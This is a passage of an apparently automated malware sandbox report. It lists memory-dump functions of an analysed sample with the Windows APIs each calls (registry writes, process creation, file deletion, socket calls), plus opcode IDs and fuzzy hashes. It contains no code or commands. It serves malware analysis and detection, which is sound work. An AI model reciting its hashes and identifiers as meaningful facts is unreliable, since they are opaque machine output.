                                                                      • Instruction Fuzzy Hash: 55315E72100301AFEB22CF65CC41FA6BBECEF49710F04896AFA859A191D265F959CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E036E8, Relevance: 1.6, APIs: 1, Instructions: 106networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAIoctl.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E037BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Ioctl
                                                                      • String ID:
                                                                      • API String ID: 3041054344-0
                                                                      • Opcode ID: 7a45a32b94dad542617427898c47d809cfe42f12ba35505e302b119e5ca91c9c
                                                                      • Instruction ID: 6501003bd84e69984ba1d406909270d82df01eb49ae314b1a84fecc1ab667db8
                                                                      • Opcode Fuzzy Hash: 7a45a32b94dad542617427898c47d809cfe42f12ba35505e302b119e5ca91c9c
                                                                      • Instruction Fuzzy Hash: 19414D7140D7C0AFD7238B658C54F52BFB8AF47214F0985DBE985CB1A3D225A849C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E021A4, Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 04E02282
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionsEnum
                                                                      • String ID:
                                                                      • API String ID: 3832085198-0
                                                                      • Opcode ID: 39e0eb531321752139b3b0e94e50857accde43311b899ec636470538816e911a
                                                                      • Instruction ID: 6435a968dce4e1493a231d96ad6d6c492849b055244a4e8828e5df806bc4fb45
                                                                      • Opcode Fuzzy Hash: 39e0eb531321752139b3b0e94e50857accde43311b899ec636470538816e911a
                                                                      • Instruction Fuzzy Hash: D031507540E3C05FD7138B758C61AA1BFB4EF47614F0A45DBD8848F1A3D2646909CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E04C7A, Relevance: 1.6, APIs: 1, Instructions: 104registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegSetValueExW.KERNELBASE(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E04D44
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 6028012dfb0b14055e1785a77cc04d07b98da97c6f464bb867ea1dadac57ae0e
                                                                      • Instruction ID: c252332e7385c2cca56d23c1f51aee953038cb41a40573a37be326ca10b13c40
                                                                      • Opcode Fuzzy Hash: 6028012dfb0b14055e1785a77cc04d07b98da97c6f464bb867ea1dadac57ae0e
                                                                      • Instruction Fuzzy Hash: 14315D7100E3C0AFD7138B648D50B52BFB8AF07214F0985DBE985DB2A3D268A849C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0302A, Relevance: 1.6, APIs: 1, Instructions: 103fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E030BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 9c0e213dc3211c3488af5dbfb52033de8758fb9113098219e8f98205cbfa24cf
                                                                      • Instruction ID: d3605f482feef9377c7b2255ac514de9fbb3c41714352e4c2432281351e95fa0
                                                                      • Opcode Fuzzy Hash: 9c0e213dc3211c3488af5dbfb52033de8758fb9113098219e8f98205cbfa24cf
                                                                      • Instruction Fuzzy Hash: 63317E7550E3C09FD7138B359C55692BFB4EF43224B0980EBDD85CF2A3D229A949C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E035E9, Relevance: 1.6, APIs: 1, Instructions: 97windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FormatMessageW.KERNEL32(?,00000E2C,?,?), ref: 04E036B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FormatMessage
                                                                      • String ID:
                                                                      • API String ID: 1306739567-0
                                                                      • Opcode ID: bcdf5fff2f51ec300195e1959830a143f0e455d8bef956792ed071c63941713c
                                                                      • Instruction ID: 790caeaccdb61dea820286b816d0c5de275208c9e3ed7aaca9d34444506d6156
                                                                      • Opcode Fuzzy Hash: bcdf5fff2f51ec300195e1959830a143f0e455d8bef956792ed071c63941713c
                                                                      • Instruction Fuzzy Hash: 32317E7150E3C05FD7038B758C61B65BFB49F47610F1D80CBD8848F2A3E624691AC7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06956, Relevance: 1.6, APIs: 1, Instructions: 97processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,00000E2C), ref: 04E06A20
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 4f42aec920e0c808326a235ebd28de884e8ec5753a524eb25f7e964b1e032f9c
                                                                      • Instruction ID: 0173b61ee71b90c7a671033a910db8aea6ab5f29ff01bcd1f4973fa0d1d7c488
                                                                      • Opcode Fuzzy Hash: 4f42aec920e0c808326a235ebd28de884e8ec5753a524eb25f7e964b1e032f9c
                                                                      • Instruction Fuzzy Hash: 64319071200201AFEB31DF65CC41FA6FBECEF08710F14896AFA459A291D671F555CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00D20, Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 04E00DBF
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: e4c6b14f40dc972f3feba34f35adb58189aead6dbc3a3eae77c61815daa74890
                                                                      • Instruction ID: 6021c7a973f3508e938f9ce465139f30fe351bd83fa0b06c1e7155d6463cbd14
                                                                      • Opcode Fuzzy Hash: e4c6b14f40dc972f3feba34f35adb58189aead6dbc3a3eae77c61815daa74890
                                                                      • Instruction Fuzzy Hash: DC31C272404344AFEB228F65DC44F67BFACEF45320F04886EF985DB152D224A819CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03BCE, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04E03C7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 327e7181dd53a8ad8a7042d0221f66f20220444ae2f3a030038e60a22a744a7f
                                                                      • Instruction ID: 556ec73fa89632e20072f56dc3abbf0ec9ec94adace78e5928f5adad79e791f7
                                                                      • Opcode Fuzzy Hash: 327e7181dd53a8ad8a7042d0221f66f20220444ae2f3a030038e60a22a744a7f
                                                                      • Instruction Fuzzy Hash: 103191B2409384AFE7228B65DC44F66BFA8EF46310F08849BED849B253D224A949C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E034F2, Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getnameinfo.WS2_32(?,00000E2C), ref: 04E03589
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getnameinfo
                                                                      • String ID:
                                                                      • API String ID: 1866240144-0
                                                                      • Opcode ID: bf73b222856708f3b4aadbaf920c25cd3d5154a0cf24cda77b9c13aed47756b2
                                                                      • Instruction ID: 10ba712c55a4add040d5b96b92d6270f123090421400f48f131c6b59c29fc92a
                                                                      • Opcode Fuzzy Hash: bf73b222856708f3b4aadbaf920c25cd3d5154a0cf24cda77b9c13aed47756b2
                                                                      • Instruction Fuzzy Hash: 0E218F72500204AFEB21DF65DC80FABFBACEF04710F04895AEE46CA291D670E549CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E01231, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: 9eedca87ba230cb7a2872b5a2494b0d601ea018293395a77974e462d5bec74f1
                                                                      • Instruction ID: 8417d2d9a10078ce4c547fe8ea0387e395184bb553b8c188a0b54983c5bd2a3d
                                                                      • Opcode Fuzzy Hash: 9eedca87ba230cb7a2872b5a2494b0d601ea018293395a77974e462d5bec74f1
                                                                      • Instruction Fuzzy Hash: 5D318171509380AFE712CB25DC45F96FFA8EF06314F08849AE9849F293D375A949CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00C18, Relevance: 1.6, APIs: 1, Instructions: 90timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessTimes.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: 322273ce012432e825d05238ba0e74654f87806bdc66b752cda38da710fcb488
                                                                      • Instruction ID: 6b52ac221222ec609e5df83279d61b8b265590a1cfe969869a5ca28bd1fb0922
                                                                      • Opcode Fuzzy Hash: 322273ce012432e825d05238ba0e74654f87806bdc66b752cda38da710fcb488
                                                                      • Instruction Fuzzy Hash: CD31E572009380AFEB128F64DC45F96BFB8EF06314F0884DBE9859B193C225A945C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E005CC, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 08ec3bc1ba6ce1fa2c06255f82fc228b5b1ec407e3728d5fc553f6a0858825b9
                                                                      • Instruction ID: 82b7c944d5083435ff7825891af656ba9488bb14fd18f47272fe2d698dfbb830
                                                                      • Opcode Fuzzy Hash: 08ec3bc1ba6ce1fa2c06255f82fc228b5b1ec407e3728d5fc553f6a0858825b9
                                                                      • Instruction Fuzzy Hash: 1B31E4B2404780AFE722CF54DC44F96FFF8EF06320F04859AE9849B252D364A549CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E061FB, Relevance: 1.6, APIs: 1, Instructions: 85encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E06292
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CertCertificateChainPolicyVerify
                                                                      • String ID:
                                                                      • API String ID: 3930008701-0
                                                                      • Opcode ID: f9944ff2ea4a3d49dd728b909415a8b23d0d5292dd1d5d0d8bb909d867ea2913
                                                                      • Instruction ID: 7b1d22ca1940ad734d4c738e45f9972299ce860c78a3ac4dc5774f8debd2b616
                                                                      • Opcode Fuzzy Hash: f9944ff2ea4a3d49dd728b909415a8b23d0d5292dd1d5d0d8bb909d867ea2913
                                                                      • Instruction Fuzzy Hash: 4C21E771509384AFE7128F64DC44F56BFB8EF06320F18849BE984DF293D224A849C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00959, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateMutexW.KERNEL32(?,?), ref: 04E009F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: 60690895db6b138b0cb7dc0c685e7b8a8b50d1cc58ca2ab39e524646a60a9c41
                                                                      • Instruction ID: d728766cee05aed779a0276ab4f44191acad63656bc0621789179e2d7cdfa907
                                                                      • Opcode Fuzzy Hash: 60690895db6b138b0cb7dc0c685e7b8a8b50d1cc58ca2ab39e524646a60a9c41
                                                                      • Instruction Fuzzy Hash: 333161B1509380AFE712CF65DC45F56FFF8EF45220F08849AE9889B292D375E948CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03F66, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getaddrinfo.WS2_32(?,00000E2C), ref: 04E0400B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getaddrinfo
                                                                      • String ID:
                                                                      • API String ID: 300660673-0
                                                                      • Opcode ID: c735b3b74c8f33ecc696e03f8f4584f890d58e895f14106ab565daaca59907f5
                                                                      • Instruction ID: 7465cd102125209ef1f61a5d440f978885b7ebd9eb2512ed1203cff5779cb2df
                                                                      • Opcode Fuzzy Hash: c735b3b74c8f33ecc696e03f8f4584f890d58e895f14106ab565daaca59907f5
                                                                      • Instruction Fuzzy Hash: A521BF71100304BFFB21DF64CC85FABFBACEF44710F10885AFA48AA281D6B4A5498B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E038E0, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 04E03979
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CurrentOpenUser
                                                                      • String ID:
                                                                      • API String ID: 1571386571-0
                                                                      • Opcode ID: d26e97a4a93c50d5e04f53ede4157fe866f9ff3339353aa53ece4385e40d18eb
                                                                      • Instruction ID: 8742140741f5e8ee04c842ab560320c49075d170055cd1f76b098dff738d4ebb
                                                                      • Opcode Fuzzy Hash: d26e97a4a93c50d5e04f53ede4157fe866f9ff3339353aa53ece4385e40d18eb
                                                                      • Instruction Fuzzy Hash: 4B21D371409384AFE7128B25DC45F66FFB8EF46314F08849BED849F253D264A909CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E014E9, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04E01596
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      • Opcode ID: 5b67471f0c139ce597291a1b0a1f02e88c2dabad8b7e4a2d53a4f0aa02af0034
                                                                      • Instruction ID: 9019bd7ea08779f05ddf57854530a4c39fe61b39a105d130a2ded1f47e660384
                                                                      • Opcode Fuzzy Hash: 5b67471f0c139ce597291a1b0a1f02e88c2dabad8b7e4a2d53a4f0aa02af0034
                                                                      • Instruction Fuzzy Hash: A13180715093C06FD3138B259C55F62BFB8EF87610F1A81DBE8848B653D264A919C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06CCC, Relevance: 1.6, APIs: 1, Instructions: 82windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 04E06D71
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID:
                                                                      • API String ID: 2030045667-0
                                                                      • Opcode ID: 31acdc02cd753696e34ffd0754eafeddbbb9dde697d7fae04ae6e4377a83c5f4
                                                                      • Instruction ID: cae55363897f23ee018c307da4faf51603348e453ddd37f6dedc2348e4a3ce5d
                                                                      • Opcode Fuzzy Hash: 31acdc02cd753696e34ffd0754eafeddbbb9dde697d7fae04ae6e4377a83c5f4
                                                                      • Instruction Fuzzy Hash: 6D314F7150E7C09FD7138F258C54A52BFB4EF17614B0A84DBDC84CB2A3D268A858C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E053C9, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32GetModuleInformation.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0545A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationModule
                                                                      • String ID:
                                                                      • API String ID: 3425974696-0
                                                                      • Opcode ID: 2237730302c5c94ac3092d099024b2f323e9070b11a3c3a816a0d235b78c44d7
                                                                      • Instruction ID: 779ea5a13d55f6aa77a8ca6975d0f9a8a1dc7746886107857918e3e4f53fbac3
                                                                      • Opcode Fuzzy Hash: 2237730302c5c94ac3092d099024b2f323e9070b11a3c3a816a0d235b78c44d7
                                                                      • Instruction Fuzzy Hash: 6621B671505340AFE722CF25DC44F56BFA8EF46310F08849BE945DB292D264E848CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E054C0, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 04E05566
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileModuleName
                                                                      • String ID:
                                                                      • API String ID: 514040917-0
                                                                      • Opcode ID: ce90d024a30b8092ccc4debc84308f9dc83ba068c77985108903dbb94e51466c
                                                                      • Instruction ID: 201ce5bf4eacb553d3a8c49e47ef1ffd66f9aecae7d9218771dade4433fd2b8a
                                                                      • Opcode Fuzzy Hash: ce90d024a30b8092ccc4debc84308f9dc83ba068c77985108903dbb94e51466c
                                                                      • Instruction Fuzzy Hash: 9221A2714093C06FD312CB65CC55F66BFB4EF87610F0984DBD8848B2A3D624A909C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00D42, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 04E00DBF
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 1c9770ac9d0723c57f71dd0731aaad1fc977a654cde640b732b872637b27af8e
                                                                      • Instruction ID: 0d5d7f269b2e6191e41bc413f4ee599c61074f32aea7ab43f9194ecccf15283d
                                                                      • Opcode Fuzzy Hash: 1c9770ac9d0723c57f71dd0731aaad1fc977a654cde640b732b872637b27af8e
                                                                      • Instruction Fuzzy Hash: AF21AF72500304EFEB219F65DC44FABFBACEF08320F14896BEE459B251D670A5598B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E052E0, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32EnumProcessModules.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0536A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EnumModulesProcess
                                                                      • String ID:
                                                                      • API String ID: 1082081703-0
                                                                      • Opcode ID: eb8e160461edfcd650fc0ac58dabee15fdbc84cb606c5d8ccaa80aca395bf9c5
                                                                      • Instruction ID: a7db7313b2e87b320e0c3147a773b7725cc16536bf6c5a83b5929f888ea52ec4
                                                                      • Opcode Fuzzy Hash: eb8e160461edfcd650fc0ac58dabee15fdbc84cb606c5d8ccaa80aca395bf9c5
                                                                      • Instruction Fuzzy Hash: 8021A771509384AFE712CF65DC45F56FFB8EF46320F08849BE985DB292D264A848CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E032D1, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E03369
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdaptersAddresses
                                                                      • String ID:
                                                                      • API String ID: 2506852604-0
                                                                      • Opcode ID: c5c46065999cb605211ef043c8652877c6249068484f3b45012260cebea3669a
                                                                      • Instruction ID: 2db9b6284065e6e655dda58a8e993753918eb6756900c0926a147f54ca8972be
                                                                      • Opcode Fuzzy Hash: c5c46065999cb605211ef043c8652877c6249068484f3b45012260cebea3669a
                                                                      • Instruction Fuzzy Hash: 95217171009380AFD7128F25CC44F66BFB8EF46320F0885DBE9949E292C365A449CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E01343, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E013D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      • String ID:
                                                                      • API String ID: 31538577-0
                                                                      • Opcode ID: 45cffe33052be4aaf0854d714d2d431c43d2e9ec2f7cf2d406650321a82d3958
                                                                      • Instruction ID: 5b076377174a1b21322103d124fe297e7be6cd1da01563eb565a11c357065136
                                                                      • Opcode Fuzzy Hash: 45cffe33052be4aaf0854d714d2d431c43d2e9ec2f7cf2d406650321a82d3958
                                                                      • Instruction Fuzzy Hash: 51218172409384AFD7128F65CC44F96FFB8EF46310F0884ABEA84DF252D225A548C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E004EA, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 04E00575
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      • String ID:
                                                                      • API String ID: 1680863896-0
                                                                      • Opcode ID: bd8ee72aa9000da2c0fd04e52314d61b01e2e80fac3d26400287ad1ae83cd7e4
                                                                      • Instruction ID: b3ecc7397128165d9fcb5b93b7867443c85af4cf05763606273264493a0938be
                                                                      • Opcode Fuzzy Hash: bd8ee72aa9000da2c0fd04e52314d61b01e2e80fac3d26400287ad1ae83cd7e4
                                                                      • Instruction Fuzzy Hash: 2A21B171505380AFE721CF65DC45F56FFA8EF46210F08849EE9848B292D375E948CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03AF3, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E03B84
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeNotifyValue
                                                                      • String ID:
                                                                      • API String ID: 3933585183-0
                                                                      • Opcode ID: a2dc07dcc49fd01aa42458c7f2409d229009aac4565cb689a7f19db2af2921da
                                                                      • Instruction ID: 767fbb6aac3ffbb90fc51c33e98200baa9e8a5765585bbdfd63c15e8ac2f5b2c
                                                                      • Opcode Fuzzy Hash: a2dc07dcc49fd01aa42458c7f2409d229009aac4565cb689a7f19db2af2921da
                                                                      • Instruction Fuzzy Hash: EC21A171009384AFD7228F64DC44F97FFB8EF46314F04889BEA849B252D224A548CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03A06, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04E03A85
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 550baabf70aab0be3052b2a411df25d390cd083f1b958b245b8d2f2c1d259521
                                                                      • Instruction ID: 667e1b5cc5875e6c0a1e2dd99f9001f139e5dc7469f658fd5e83588ba982cacc
                                                                      • Opcode Fuzzy Hash: 550baabf70aab0be3052b2a411df25d390cd083f1b958b245b8d2f2c1d259521
                                                                      • Instruction Fuzzy Hash: 3D219D72500204AEE721DF65DC44FABFBACEF04720F14886AEE959B241D660A5488A71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00007, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00091
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: a091b65e613ca698af9a4e0cbd2bace22b96dcc3e48fb9dd7c54f791626ef373
                                                                      • Instruction ID: c2a360d982cd655ab448715299c47977d2ab098c77cdcc6fed1e10abdcb10702
                                                                      • Opcode Fuzzy Hash: a091b65e613ca698af9a4e0cbd2bace22b96dcc3e48fb9dd7c54f791626ef373
                                                                      • Instruction Fuzzy Hash: 9A21B372409380AFE7228F65DC40F67BFB8EF46314F08849BEE849B252D275A909C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03807, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RasConnectionNotificationW.RASAPI32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E038A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionNotification
                                                                      • String ID:
                                                                      • API String ID: 1402429939-0
                                                                      • Opcode ID: 5e06d0418a5f2f527fedca44abfb07999581b951ad38093a64e3103a7ce18ecf
                                                                      • Instruction ID: 3bb4df87f9895aed94dac50922de76d18ca38c4f427fc4c38bdb543dbf065b47
